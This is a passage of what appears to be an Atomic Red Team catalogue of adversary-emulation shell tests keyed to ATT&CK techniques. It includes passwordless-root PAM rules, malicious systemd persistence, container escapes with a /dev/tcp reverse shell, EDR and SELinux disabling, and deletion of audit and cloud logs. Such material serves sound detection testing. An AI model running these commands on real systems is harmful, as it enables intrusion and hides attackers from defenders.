Inserts a rule into a PAM config and then tests it. Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
T1556.003 sh elevated linux Malicious PAM rule (freebsd)
Pluggable Authentication Modules
Inserts a rule into a PAM config and then tests it. Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
sudo sed -i "" "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
T1556.003 sh elevated linux Malicious PAM module
Pluggable Authentication Modules
Creates a PAM module, inserts a rule to use it, and then tests it. Upon successful execution, this test will create a PAM module that allows every user to su to root without a password.
sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
T1560.001 sh linux, macos Data Compressed - nix - gzip Single File
Archive via Utility
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
test -e #{input_file} && gzip -k #{input_file} || (echo '#{input_content}' >> #{input_file}; gzip -k #{input_file})
T1560.001 sh linux, macos Data Compressed - nix - tar Folder or File
Archive via Utility
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
tar -cvzf #{output_file} #{input_file_folder}
T1560.001 sh linux, macos Data Encrypted with zip and gpg symmetric
Archive via Utility
Encrypt data for exiltration
mkdir -p #{test_folder}
cd #{test_folder}; touch a b c d e f g
zip --password "#{encryption_password}" #{test_folder}/#{test_file} ./*
echo "#{encryption_password}" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip
ls -l #{test_folder}
T1560.002 sh linux Compressing data using GZip in Python (FreeBSD/Linux)
Archive via Library
Uses GZip from Python to compress files
which_python=`which python || which python3`
$which_python -c "import gzip;input_file=open('#{path_to_input_file}', 'rb');content=input_file.read();input_file.close();output_file=gzip.GzipFile('#{path_to_output_file}','wb',compresslevel=6);output_file.write(content);output_file.close();"
T1560.002 sh linux Compressing data using bz2 in Python (FreeBSD/Linux)
Archive via Library
Uses bz2 from Python to compress files
which_python=`which python || which python3`
$which_python -c "import bz2;input_file=open('#{path_to_input_file}','rb');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open('#{path_to_output_file}','w+');output_file.write(str(bz2content));output_file.close();"
T1560.002 sh linux Compressing data using zipfile in Python (FreeBSD/Linux)
Archive via Library
Uses zipfile from Python to compress files
which_python=`which python || which python3`
$which_python -c "from zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('#{path_to_input_file}')"
T1560.002 sh linux Compressing data using tarfile in Python (FreeBSD/Linux)
Archive via Library
Uses tarfile from Python to compress files
which_python=`which python || which python3`
$which_python -c "import tarfile; output_file = tarfile.open('#{path_to_output_file}','w'); output_file.add('#{path_to_input_file}'); output_file.close()"
T1564.001 sh linux, macos Create a hidden file in a hidden directory
Hidden Files and Directories
Creates a hidden file inside a hidden directory
mkdir /var/tmp/.hidden-directory
echo "T1564.001" > /var/tmp/.hidden-directory/.hidden-file
T1564.001 sh macos Mac Hidden file
Hidden Files and Directories
Hide a file on MacOS
xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00"
T1564.001 sh macos Hidden files
Hidden Files and Directories
Requires Apple Dev Tools
setfile -a V #{filename}
T1564.001 sh macos Hide a Directory
Hidden Files and Directories
Hide a directory on MacOS
touch /var/tmp/T1564.001_mac.txt
chflags hidden /var/tmp/T1564.001_mac.txt
T1564.001 sh macos Show all hidden files
Hidden Files and Directories
Show all hidden files on MacOS
defaults write com.apple.finder AppleShowAllFiles YES
T1564.002 sh elevated macos Create Hidden User using UniqueID < 500
Hidden Users
Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default)
sudo dscl . -create /Users/#{user_name} UniqueID 333
T1564.002 sh elevated macos Create Hidden User using IsHidden option
Hidden Users
Add a hidden user on macOS using IsHidden optoin
sudo dscl . -create /Users/#{user_name} IsHidden 1
T1569.003 sh elevated linux Create and Enable a Malicious systemd Service Unit
Systemctl
Creates a new systemd service unit file in /etc/systemd/system/ and enables it using systemctl enable followed by systemctl start. Adversaries commonly abuse this workflow to establish persistence or execute arbitrary commands under the context of systemd. This simulates the full attacker workflow: writing the unit file, reloading the systemd daemon, enabling the service to survive reboots, and starting it immediately. This is consistent with techniques observed in ransomware precursor activity and post-exploitation frameworks targeting Linux infrastructure.
echo "[Unit]" > /etc/systemd/system/#{service_name}.service
echo "Description=Atomic Test Service" >> /etc/systemd/system/#{service_name}.service
echo "After=network.target" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Service]" >> /etc/systemd/system/#{service_name}.service
echo "ExecStart=#{command_to_run}" >> /etc/systemd/system/#{service_name}.service
echo "Restart=on-failure" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Install]" >> /etc/systemd/system/#{service_name}.service
echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
systemctl enable #{service_name}.service
systemctl start #{service_name}.service
systemctl status #{service_name}.service
T1569.003 sh elevated linux Create systemd Service Unit from /tmp (Unusual Location)
Systemctl
Creates a systemd service unit file in /tmp and loads it using systemctl start with an absolute path. Adversaries may write service unit files to world-writable directories such as /tmp to avoid triggering alerts on new file creation in standard service directories, or to execute payloads transiently without permanently installing a service. Loading a service unit from an arbitrary path rather than a standard systemd directory is unusual behaviour that should be detectable by monitoring systemctl command arguments.
echo "[Unit]" > #{service_path}
echo "Description=Atomic Tmp Service" >> #{service_path}
echo "" >> #{service_path}
echo "[Service]" >> #{service_path}
echo "ExecStart=#{command_to_run}" >> #{service_path}
echo "" >> #{service_path}
echo "[Install]" >> #{service_path}
echo "WantedBy=multi-user.target" >> #{service_path}
systemctl link #{service_path}
systemctl start $(basename #{service_path})
systemctl status $(basename #{service_path})
T1569.003 sh elevated linux Create systemd Service Unit from /dev/shm (Unusual Location)
Systemctl
Creates a systemd service unit file in /dev/shm and loads it using systemctl. /dev/shm is a memory-backed filesystem that is world-writable on most Linux systems and does not persist across reboots, making it particularly attractive to adversaries seeking to execute transient payloads while evading file-based forensic detection. This technique has been observed in post-exploitation scenarios where attackers deliberately avoid writing to disk-backed locations to limit forensic artefacts.
echo "[Unit]" > #{service_path}
echo "Description=Atomic SHM Service" >> #{service_path}
echo "" >> #{service_path}
echo "[Service]" >> #{service_path}
echo "ExecStart=#{command_to_run}" >> #{service_path}
echo "" >> #{service_path}
echo "[Install]" >> #{service_path}
echo "WantedBy=multi-user.target" >> #{service_path}
systemctl link #{service_path}
systemctl start $(basename #{service_path})
systemctl status $(basename #{service_path})
T1569.003 sh elevated linux Modify Existing systemd Service to Execute Malicious Command
Systemctl
Creates a service unit file that initially runs a benign command, then modifies the ExecStart directive using sed to substitute a malicious command before reloading and restarting the service. Adversaries may hijack existing services to blend in with normal service activity and avoid triggering detections focused solely on new service creation. This technique reflects the tradecraft observed in more sophisticated intrusions where blending into existing process trees is a priority over creating net-new services.
echo "[Unit]" > /etc/systemd/system/#{service_name}.service
echo "Description=Legitimate Looking Service" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Service]" >> /etc/systemd/system/#{service_name}.service
echo "ExecStart=/bin/true" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Install]" >> /etc/systemd/system/#{service_name}.service
echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
sed -i 's|ExecStart=.*|ExecStart=#{malicious_command}|' /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
systemctl start #{service_name}.service
systemctl status #{service_name}.service
T1569.003 sh elevated linux Execute Command via Transient systemd Service (systemd-run)
Systemctl
Uses systemd-run to execute a command as a transient systemd service without creating a persistent unit file on disk. Adversaries may use systemd-run to execute arbitrary commands under the context of systemd while bypassing controls that monitor for new unit file creation, since transient services exist only in memory for their lifetime. This is a particularly stealthy technique as it leaves minimal on-disk artefacts and the service disappears from systemctl list-units once execution completes.
systemd-run --unit=#{unit_name} --wait #{command_to_run}
systemctl status #{unit_name}.service 2>/dev/null || echo "Transient service has already completed and exited."
T1569.003 sh linux Enumerate All systemd Services Using systemctl
Systemctl
Enumerates all systemd services and their current states using systemctl list-units and systemctl list-unit-files. Adversaries may enumerate running and enabled services to identify targets for hijacking, understand the host environment, map installed security tooling, or identify gaps in monitoring coverage. Service enumeration is a common reconnaissance step during post-exploitation and may precede service hijacking or masquerading activity. This test does not require elevation as service listing is available to unprivileged users on most Linux systems.
systemctl list-units --type=service --all
systemctl list-unit-files --type=service
T1569.003 sh elevated linux Enable systemd Service for Persistence with Auto-Restart
Systemctl
Creates a payload script and a systemd service unit that executes it, then enables the service to survive reboots using systemctl enable. The service is configured with Restart=always to automatically restart on failure, mimicking the persistence mechanism used by adversaries deploying backdoors or beacons on Linux hosts. This technique is consistent with observed post-exploitation tradecraft where adversaries establish a foothold that survives reboots and self-heals after interruption, complicating incident response and remediation efforts.
echo "[Unit]" > /etc/systemd/system/#{service_name}.service
echo "Description=Atomic Persistence Service" >> /etc/systemd/system/#{service_name}.service
echo "After=network.target" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Service]" >> /etc/systemd/system/#{service_name}.service
echo "ExecStart=#{payload_path}" >> /etc/systemd/system/#{service_name}.service
echo "Restart=always" >> /etc/systemd/system/#{service_name}.service
echo "RestartSec=10" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Install]" >> /etc/systemd/system/#{service_name}.service
echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
systemctl enable #{service_name}.service
systemctl start #{service_name}.service
systemctl status #{service_name}.service
T1569.003 sh elevated linux Masquerade Malicious Service as Legitimate System Service
Systemctl
Creates a systemd service with a name and description closely resembling a legitimate system service to blend in with normal service activity. Adversaries may deliberately choose service names similar to well-known system services such as systemd-networkd, cron, or ssh to evade detection from analysts reviewing service lists or automated alerting on service names. This masquerading technique is particularly effective in environments where detection relies on service name allowlists or manual review of systemctl list-units output rather than behavioural analysis of service unit file contents and ExecStart paths.
echo "[Unit]" > /etc/systemd/system/#{masquerade_name}.service
echo "Description=Network connectivity helper service" >> /etc/systemd/system/#{masquerade_name}.service
echo "After=network.target" >> /etc/systemd/system/#{masquerade_name}.service
echo "Before=network-online.target" >> /etc/systemd/system/#{masquerade_name}.service
echo "" >> /etc/systemd/system/#{masquerade_name}.service
echo "[Service]" >> /etc/systemd/system/#{masquerade_name}.service
echo "ExecStart=#{command_to_run}" >> /etc/systemd/system/#{masquerade_name}.service
echo "Restart=on-failure" >> /etc/systemd/system/#{masquerade_name}.service
echo "RestartSec=5" >> /etc/systemd/system/#{masquerade_name}.service
echo "" >> /etc/systemd/system/#{masquerade_name}.service
echo "[Install]" >> /etc/systemd/system/#{masquerade_name}.service
echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{masquerade_name}.service
systemctl daemon-reload
systemctl start #{masquerade_name}.service
systemctl status #{masquerade_name}.service
T1571 sh linux, macos Testing usage of uncommonly used port
Non-Standard Port
Testing uncommonly used port utilizing telnet.
echo quit | telnet #{domain} #{port}
exit 0
T1572 sh linux, macos VSCode tunnels (Linux/macOS)
Protocol Tunneling
Visual Studio Code Remote Tunnels can be used for exposing local development environment/services/files over the internet. This atomic will generate a dev tunnel binding it to the local service running on the provided port. Reference: - [Microsoft Docs](https://code.visualstudio.com/docs/remote/tunnels) - [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/vscode-server/)
nohup code tunnel --accept-server-license-terms #{additional_args} >/dev/null 2>&1 &
T1572 sh linux, macos Cloudflare tunnels (Linux/macOS)
Protocol Tunneling
Cloudflared can be used for exposing local development environment/services/files over the internet. This atomic will generate a dev tunnel binding it to the local service running on the provided port. Reference: - [Cloudflared Docs](https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/) - [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/cloudflared/)
nohup #{binary_path} tunnel --url #{url_to_tunnel} #{additional_args} >/dev/null 2>&1 &
T1578.001 sh iaas:aws AWS - Create Snapshot from EBS Volume
Create Snapshot
Creates an EBS snapshot in AWS using the AWS CLI. This simulates an adversary duplicating volume data via snapshots for persistence or exfiltration.
aws ec2 create-snapshot --region #{aws_region} --volume-id #{aws_volume_id} --description "Atomic Red Team Test Snapshot" --query "SnapshotId" --output text
T1578.001 sh iaas:azure Azure - Create Snapshot from Managed Disk
Create Snapshot
Creates a snapshot of a managed disk in Azure using the Azure CLI. Simulates adversary snapshotting behavior for persistence or data duplication.
az snapshot create --resource-group #{azure_resource_group} --name #{azure_snapshot_name} --source #{azure_disk_name} --location eastus
T1578.001 sh iaas:gcp GCP - Create Snapshot from Persistent Disk
Create Snapshot
Creates a snapshot of a persistent disk in GCP using the gcloud CLI. Emulates adversary behavior to gain access to volume data or replicate environment state.
gcloud compute snapshots create #{gcp_snapshot_name} --source-disk=#{gcp_disk_name} --zone=#{gcp_zone}
T1578.002 sh iaas:aws, linux Create EC2 Instance from Launch Template
Create Cloud Instance
Creating and launching an instance using RunInstances, with a launch template. This launch template will contain all the necessary parameters for the instance. Reference for the launch templates https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/create-launch-template.html https://docs.aws.amazon.com/cli/latest/reference/ec2/run-instances.html#examples
aws ec2 create-launch-template \
  --launch-template-name #{template_name} \
  --version-description #{version} \
  --tag-specifications 'ResourceType=launch-template,Tags=[{Key=purpose,Value=production}]' \
  --launch-template-data file://template.json

aws ec2 run-instances --image-id #{ami_id} --instance-type #{instance_type} \
  --region #{aws_region} --profile #{profile_name}
T1578.002 sh iaas:aws, linux Create EC2 Instance with user data
Create Cloud Instance
Creates an EC2 instance with a keypair while passing user data in a script. The script runs at launch.
printf '%s\n' '#!/bin/bash' 'date -u > /var/tmp/userdata-ran.txt' > my_script.txt
aws ec2 run-instances \
  --image-id #{ami_id} \
  --instance-type #{instance_type} \
  --count 1 \
  --subnet-id subnet-XXXXXXXXXXXXXXX \
  --key-name MyKeyPair \
  --user-data file://my_script.txt
T1580 sh linux, macos, iaas:aws AWS - EC2 Enumeration from Cloud Instance
Cloud Infrastructure Discovery
This atomic runs several API calls (sts:GetCallerIdentity, s3:ListBuckets, iam:GetAccountSummary, iam:ListRoles, iam:ListUsers, iam:GetAccountAuthorizationDetails, ec2:DescribeSnapshots, cloudtrail:DescribeTrails, guardduty:ListDetectors) from the context of an EC2 instance role. This simulates an attacker compromising an EC2 instance and running initial discovery commands on it. This atomic test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.discovery.ec2-enumerate-from-instance/
export AWS_REGION=#{aws_region}
cd #{stratus_path}
echo "Stratus: Start Warmup."
./stratus warmup aws.discovery.ec2-enumerate-from-instance
echo "Stratus: Start Detonate."
./stratus detonate aws.discovery.ec2-enumerate-from-instance
T1611 sh containers Deploy container using nsenter container escape
Escape to Host
In this escape kubectl is used to launch a new pod, with a container that has the host pids mapped into the container (hostPID:true). It uses the alpine linux container image. It runs with privilege on the host (privileged:true). When the container is launched the command nsenter --mount=/proc/1/ns/mnt -- /bin/bash is ran. Since the host processes have been mapped into the container, the container enters the host namespace, escaping the container. Additional Details: - https://twitter.com/mauilion/status/1129468485480751104 - https://securekubernetes.com/scenario_2_attack/
kubectl --context kind-atomic-cluster run atomic-nsenter-escape-pod --restart=Never -ti --rm --image alpine --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}'
T1611 sh elevated containers Mount host filesystem to escape privileged Docker container
Escape to Host
This technique abuses privileged Docker containers to mount the host's filesystem and then create a cron job to launch a reverse shell as the host's superuser. The container running the test needs be privileged. It may take up to a minute for this to run due to how often crond triggers a job. Dev note: the echo to create cron_filename is broken up to prevent localized execution of hostname and id by Powershell.
if [ ! -d #{mount_point} ]; then mkdir #{mount_point} ; mount #{mount_device} #{mount_point}; fi
echo -n "* * * * * root /bin/bash -c '/bin/bash -c echo \"\"; echo \"hello from host! " > #{mount_point}#{cron_path}/#{cron_filename}
echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename}
echo -n "(hostname) " >> #{mount_point}#{cron_path}/#{cron_filename}
echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename}
echo "(id)\" >& /dev/tcp/#{listen_address}/#{listen_port} 0>&1'" >> #{mount_point}#{cron_path}/#{cron_filename}
netcat -l -p #{listen_port} 2>&1
T1611 sh elevated containers Privilege Escalation via Docker Volume Mapping
Escape to Host
This test demonstrates privilege escalation by abusing Docker's volume mapping feature to gain access to the host file system. By mounting the root directory of the host into a Docker container, the attacker can use chroot to operate as root on the host system.
echo "Current user: #{username}"
sudo -u docker_user sh -c "sudo docker run -v /:/mnt --rm --name t1611_privesc -it alpine chroot /mnt id"
T1612 sh containers Build Image On Host
Build Image on Host
Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize Deploy Container using that custom image.
docker build -t t1612  $PathtoAtomicsFolder/T1612/src/
docker run --name t1612_container --rm -d -t t1612
docker exec t1612_container ./test.sh
T1613 sh containers Docker Container and Resource Discovery
Container and Resource Discovery
Adversaries may attempt to discover containers and other resources that are available within a containers environment.
docker build -t t1613 $PathtoAtomicsFolder/T1613/src/
docker run --name t1613_container --rm -d -t t1613
docker ps
docker stats --no-stream
docker inspect $(docker ps -l -q --filter ancestor=t1613)
T1613 sh containers Podman Container and Resource Discovery
Container and Resource Discovery
Adversaries may attempt to discover containers and other resources that are available within a containers environment.
podman build -t t1613 $PathtoAtomicsFolder/T1613/src/
podman run --name t1613_container --rm -d -t t1613
podman ps
podman stats --no-stream
podman inspect $(podman ps -l -q --filter ancestor=t1613)
T1614.001 sh linux Discover System Language with locale
System Language Discovery
Identify System language with the locale command. Upon successful execution, the output will contain the environment variables that indicate the 5 character locale that can be looked up to correlate the language and territory.
locale
T1614.001 sh linux Discover System Language with localectl
System Language Discovery
Identify System language with the localectl command. Upon successful execution, the key System Locale from the output will contain the LANG environment variable that has the 5 character locale result that can be looked up to correlate the language and territory.
localectl status
T1614.001 sh linux Discover System Language by locale file
System Language Discovery
Identify System language with the by reading the locale configuration file. The locale configuration file contains the LANG environment variable which will contain the 5 character locale that can be looked up to correlate the language and territory.
[ -f /etc/locale.conf ] && cat /etc/locale.conf || cat /etc/default/locale
T1614.001 sh linux Discover System Language by Environment Variable Query
System Language Discovery
Identify System language by checking the environment variables Upon successful execution, the 5 character locale result can be looked up to correlate the language and territory. Environment query commands are likely to run with a pattern match command e.g. env | grep LANG Note: env and printenv will usually provide the same results. set is also used as a builtin command that does not generate syscall telemetry but does provide a list of the environment variables.
env | grep LANG
printenv LANG
set | grep LANG
T1619 sh iaas:aws AWS S3 Enumeration
Cloud Storage Object Discovery
This test will enumerate all the S3 buckets in the user account and lists all the files in each bucket.
for bucket in "$(aws s3 ls | cut -d " " -f3)"; do aws s3api list-objects-v2 --bucket $bucket --output text; done
T1685 sh elevated linux Disable journal logging via systemctl utility
Disable or Modify Tools
The atomic test disables the journal logging using built-in systemctl utility
sudo systemctl stop systemd-journald #disables journal logging
T1685 sh elevated linux Disable journal logging via sed utility
Disable or Modify Tools
The atomic test disables the journal logging by searching and replacing the "Storage" parameter to "none" within the journald.conf file, thus any new journal entries will only be temporarily available in memory and not written to disk
sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf
T1685 sh elevated linux Disable syslog
Disable or Modify Tools
Disables syslog collection
#{flavor_command}
T1685 sh elevated linux Disable syslog (freebsd)
Disable or Modify Tools
Disables syslog collection
service syslogd stop
sysrc syslogd_enable="NO"
T1685 sh linux Disable Cb Response
Disable or Modify Tools
Disable the Cb Response service
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
  service cbdaemon stop
  chkconfig off cbdaemon
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
  systemctl stop cbdaemon
  systemctl disable cbdaemon
fi
T1685 sh elevated linux Disable SELinux
Disable or Modify Tools
Disables SELinux enforcement
setenforce 0
T1685 sh elevated linux Stop Crowdstrike Falcon on Linux
Disable or Modify Tools
Stop and disable Crowdstrike Falcon on Linux
sudo systemctl stop falcon-sensor.service
sudo systemctl disable falcon-sensor.service
T1685 sh elevated macos Disable Carbon Black Response
Disable or Modify Tools
Disables Carbon Black Response
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
T1685 sh elevated macos Disable LittleSnitch
Disable or Modify Tools
Disables LittleSnitch
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
T1685 sh elevated macos Disable OpenDNS Umbrella
Disable or Modify Tools
Disables OpenDNS Umbrella
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
T1685 sh elevated macos Disable macOS Gatekeeper
Disable or Modify Tools
Disables macOS Gatekeeper
sudo spctl --master-disable
T1685 sh elevated macos Stop and unload Crowdstrike Falcon on macOS
Disable or Modify Tools
Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS
sudo launchctl unload #{falcond_plist}
sudo launchctl unload #{userdaemon_plist}
T1685 sh elevated linux Clear History
Disable or Modify Tools
Clear Shell History. This technique only affect the bash shell application.
history -c
T1685 sh elevated linux Suspend History
Disable or Modify Tools
suspend Shell History seen in Awfulshred wiper- https://unix.stackexchange.com/questions/10922/temporarily-suspend-bash-history-on-a-given-shell
set +o history
T1685 sh elevated linux Reboot Linux Host via Kernel System Request
Disable or Modify Tools
reboot system via system request seen in Awfulshred wiper.
echo 1> /proc/sys/kernel/sysrq 
echo b> /proc/sysrq-trigger
T1685 sh elevated linux Clear Pagging Cache
Disable or Modify Tools
clear pagging cache via system request. This is a temporary change in the system to clear paging cache. This technique seen in Awfulshred wiper as part of its malicious payload on the compromised host. added reference link for this technique: https://www.tecmint.com/clear-ram-memory-cache-buffer-and-swap-space-on-linux/
free && echo 3 > /proc/sys/vm/drop_caches && free
echo 3> /proc/sys/vm/drop_caches
T1685 sh elevated linux Disable Memory Swap
Disable or Modify Tools
disable swapping of device paging that impaire the compromised host to swap data if the RAM is full. Awfulshred wiper used this technique as an additional payload to the compromised host and to make sure that there will be no recoverable data due to swap feature of FreeBSD/linux.
swapon -a 
sleep 2
swapoff -a
sync
T1685 sh elevated linux, macos Tamper with Defender ATP on Linux/MacOS
Disable or Modify Tools
With root privileges, an adversary can disable real time protection. Note, this test assumes Defender is not in passive mode and real-time protection is enabled. The use of a managed.json on Linux or Defender .plist on MacOS will prevent these changes. Tamper protection will also prevent this (available on MacOS, but not Linux at the time of writing). Installation of MDATP is a prerequisite. Installation steps vary across MacOS and Linux distros. See Microsoft public documentation for instructions: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/mac-install-manually?view=o365-worldwide https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/linux-install-manually?view=o365-worldwide
sudo mdatp config real-time-protection --value disabled
T1685 sh elevated linux Auditing Configuration Changes on FreeBSD Host
Disable or Modify Tools
Emulates modification of auditd configuration files
echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name}
T1685 sh elevated linux Logging Configuration Changes on FreeBSD Host
Disable or Modify Tools
Emulates modification of syslog configuration.
if [ -f "/etc/#{syslog_config_file_name}" ];
then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
fi
T1685.002 sh iaas:aws AWS - CloudTrail Changes
Disable or Modify Cloud Log
Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail
aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name}  --is-multi-region-trail --region #{region}
aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}
aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}
T1685.002 sh linux, macos, iaas:aws AWS - Disable CloudTrail Logging Through Event Selectors using Stratus
Disable or Modify Cloud Log
Update event selectors in AWS CloudTrail to disable the logging of certain management events to evade defense. This Atomic test leverages a tool called Stratus-Red-Team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-event-selectors/
export AWS_REGION=#{aws_region} 
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.cloudtrail-event-selectors
echo "starting detonate"
./stratus detonate aws.defense-evasion.cloudtrail-event-selectors --force
T1685.002 sh linux, macos, iaas:aws AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus
Disable or Modify Cloud Log
This Atomic test will use the Stratus Red Team will first setup a CloudTrail logging into an S3 bucket and will then make an API call to update the lifecycle rule on that S3 bucket with an expiration date of 1 day. This will essentially delete all the logs after one day. Adversaries often do this actiivity to evade detection. Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
export AWS_REGION=#{aws_region} 
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.cloudtrail-lifecycle-rule
echo "starting detonate"
./stratus detonate aws.defense-evasion.cloudtrail-lifecycle-rule --force
T1685.002 sh linux, macos, iaas:aws AWS - Remove VPC Flow Logs using Stratus
Disable or Modify Cloud Log
This Atomic will attempt to remove AWS VPC Flow Logs configuration. Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.vpc-remove-flow-logs/
export AWS_REGION=#{aws_region} 
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.vpc-remove-flow-logs
echo "starting detonate"
./stratus detonate aws.defense-evasion.vpc-remove-flow-logs --force
T1685.002 sh iaas:aws AWS - CloudWatch Log Group Deletes
Disable or Modify Cloud Log
Creates a new cloudWatch log group in AWS, Upon successful creation it will Delete the group. Attackers can use this technique to evade defenses by deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion
aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Created ***"
aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Deleted ***"
T1685.002 sh iaas:aws AWS CloudWatch Log Stream Deletes
Disable or Modify Cloud Log
Creates a new cloudWatch log stream in AWS, Upon successful creation it will Delete the stream. Attackers can use this technique to evade defenses by deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-stream-deletion.html
aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Created ***"
aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
echo "*** Log Stream Created ***"
aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
echo "*** Log Stream Deleted ***"
aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Deleted ***"
T1685.002 sh iaas:gcp GCP - Delete Activity Event Log
Disable or Modify Cloud Log
GCP provides 4 types of Cloud Audit Logs: Admin Activity, Data Access, System Events, and Policy Denied. An adversary may attempt to delete logs in order to hide their activity. However, Admin Activity, System Events, and Policy Deny events logs cannot be deleted. This Atomic attempts to delete the Activity Event log. An event is generated under the method name of google.logging.v2.LoggingServiceV2.DeleteLog with a Serverity of ERROR.
gcloud config set project #{project-id}
gcloud logging logs delete projects/#{project-id}/logs/cloudaudit.googleapis.com%2Factivity --quiet
T1685.002 sh iaas:aws AWS - Config Logs Disabled
Disable or Modify Cloud Log
Disables AWS Config by stopping the configuration recorder, deleting the delivery channel, and deleting the configuration recorder. An attacker with sufficient permissions can use this to stop configuration change recording and avoid detection of subsequent activity.
aws configservice stop-configuration-recorder --configuration-recorder-name #{configuration_recorder_name} --region #{region}
echo "*** Configuration recorder stopped ***"
aws configservice delete-delivery-channel --delivery-channel-name #{delivery_channel_name} --region #{region}
echo "*** Delivery channel deleted ***"
aws configservice delete-configuration-recorder --configuration-recorder-name #{configuration_recorder_name} --region #{region}
echo "*** Configuration recorder deleted ***"
T1685.004 sh elevated linux Delete all auditd rules using auditctl
Disable or Modify Linux Audit System Log
Using 'auditctl -D' deletes all existing audit rules, resulting in the loss of previously configured monitoring settings and the audit trail. This action reduces visibility into system activities, potentially leading to compliance concerns and hampering security monitoring efforts. Additionally, it poses a risk of covering unauthorized activities by erasing evidence from audit logs.
auditctl -D
T1685.004 sh elevated linux Disable auditd using auditctl
Disable or Modify Linux Audit System Log
